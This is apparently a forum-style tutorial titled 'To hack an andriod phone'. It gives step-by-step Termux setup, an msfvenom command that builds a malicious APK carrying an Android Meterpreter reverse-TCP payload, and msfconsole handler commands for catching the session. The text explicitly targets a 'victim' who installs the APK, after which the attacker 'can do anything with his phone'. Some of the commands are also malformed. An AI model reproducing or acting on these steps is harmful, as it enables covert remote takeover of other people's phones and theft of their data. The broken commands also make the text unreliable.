To hack an andriod phone :--

STEP 1. Download Termux from play store

STEP 2.Open termux app

STEP 3.Apply command termux-setup-storage and allow premission

STEP 4.Insert command pkg install update && upgrade

STEP 5.pkg install git

STEP 6. git clone

After installationis finished simply put the command

msfvenom -p android/meterpreter/reverse_tcp/LHOST="your ip address" LPORT="4444" R > /sdcard/xyz.apk

to find your ip just simply open a new session and write ifconfig

and another new session and write msfconsole

After starting the msfconsole

just follow the commands

1.use exploit/multi/handler

2.set payload android/meterpreter/reverse_tcp

3.set lhost enter ip address without double quotes

4.set lport 4444

when your victim install your apk you will get the session and you can do anything with his phone but this is only for local area network..